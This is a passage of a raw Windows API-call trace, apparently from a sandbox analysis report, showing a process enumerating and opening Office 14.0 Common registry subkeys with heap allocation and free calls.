(in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.863] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.863] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x3, lpName=0x91287f8, cchName=0x400 | out: lpName="HelpViewer") returned 0x0 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.863] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\HelpViewer", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.863] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="MessageMap") returned 0x0 [0134.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.864] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\HelpViewer\\MessageMap", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.864] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.864] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.864] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="MessageMap") returned 0x103 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.864] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.864] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x4, lpName=0x91287f8, cchName=0x400 | out: lpName="Internet") returned 0x0 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.864] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Internet", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.864] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.864] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.864] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x5, lpName=0x91287f8, cchName=0x400 | out: lpName="LanguageResources") returned 0x0 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.864] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.865] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LanguageResources", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e18 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.865] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="EnabledLanguages") returned 0x0 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e40 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.865] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LanguageResources\\EnabledLanguages", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e40 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9175e40 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.865] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.865] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.865] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e40 | out: hHeap=0x3f0000) returned 1 [0134.865] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.866] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="EnabledLanguages") returned 0x103 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9175e18 | out: hHeap=0x3f0000) returned 1 [0134.866] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.866] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x6, lpName=0x91287f8, cchName=0x400 | out: lpName="LCCache") returned 0x0 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.866] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.866] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="AccessParts") returned 0x0 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.866] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\AccessParts", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.866] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.866] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.866] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.866] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\AccessParts\\1033", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.867] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.867] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.867] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.867] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.867] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x1, lpName=0x9128c00, cchName=0x400 | out: lpName="SmartArt") returned 0x0 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.867] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\SmartArt", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.867] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.867] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.867] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.867] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\SmartArt\\1033", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.868] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.868] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.868] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.868] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.868] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x2, lpName=0x9128c00, cchName=0x400 | out: lpName="Themes") returned 0x0 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.868] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\Themes", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.868] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.868] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\Themes\\1033", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.868] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.868] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.869] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.869] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.869] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.869] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.869] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x3, lpName=0x9128c00, cchName=0x400 | out: lpName="WordDocParts") returned 0x0 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.869] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\WordDocParts", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e90 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129008 [0134.869] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x0, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x0 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.869] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\LCCache\\WordDocParts\\1033", phkResult=0x36f20c | out: phkResult=0x36f20c*=0x5bc) returned 0x0 [0134.869] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.869] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127be8 [0134.870] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9129410 [0134.870] RegEnumKeyA (in: hKey=0x5bc, dwIndex=0x0, lpName=0x9129410, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129410 | out: hHeap=0x3f0000) returned 1 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127be8 | out: hHeap=0x3f0000) returned 1 [0134.870] RegCloseKey (hKey=0x5bc) returned 0x0 [0134.870] RegEnumKeyA (in: hKey=0x5b8, dwIndex=0x1, lpName=0x9129008, cchName=0x400 | out: lpName="1033") returned 0x103 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9129008 | out: hHeap=0x3f0000) returned 1 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e90 | out: hHeap=0x3f0000) returned 1 [0134.870] RegCloseKey (hKey=0x5b8) returned 0x0 [0134.870] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x4, lpName=0x9128c00, cchName=0x400 | out: lpName="WordDocParts") returned 0x103 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.870] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.870] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x7, lpName=0x91287f8, cchName=0x400 | out: lpName="Licensing") returned 0x0 [0134.870] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.870] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Licensing", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.870] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.870] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.870] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.870] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.870] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.871] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x8, lpName=0x91287f8, cchName=0x400 | out: lpName="MailSettings") returned 0x0 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.871] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\MailSettings", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.871] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.871] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.871] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x9, lpName=0x91287f8, cchName=0x400 | out: lpName="MathFonts") returned 0x0 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.871] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\MathFonts", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.871] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.871] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9128c00 | out: hHeap=0x3f0000) returned 1 [0134.871] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.871] RegCloseKey (hKey=0x5b0) returned 0x0 [0134.872] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0xa, lpName=0x91287f8, cchName=0x400 | out: lpName="Migration") returned 0x0 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.872] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration", phkResult=0x36f32c | out: phkResult=0x36f32c*=0x5b0) returned 0x0 [0134.872] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174e58 | out: hHeap=0x3f0000) returned 1 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x9128c00 [0134.872] RegEnumKeyA (in: hKey=0x5b0, dwIndex=0x0, lpName=0x9128c00, cchName=0x400 | out: lpName="Access") returned 0x0 [0134.872] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.872] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Common\\Migration\\Access", phkResult=0x36f29c | out: phkResult=0x36f29c*=0x5b8) returned 0x0 [0134.872] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, 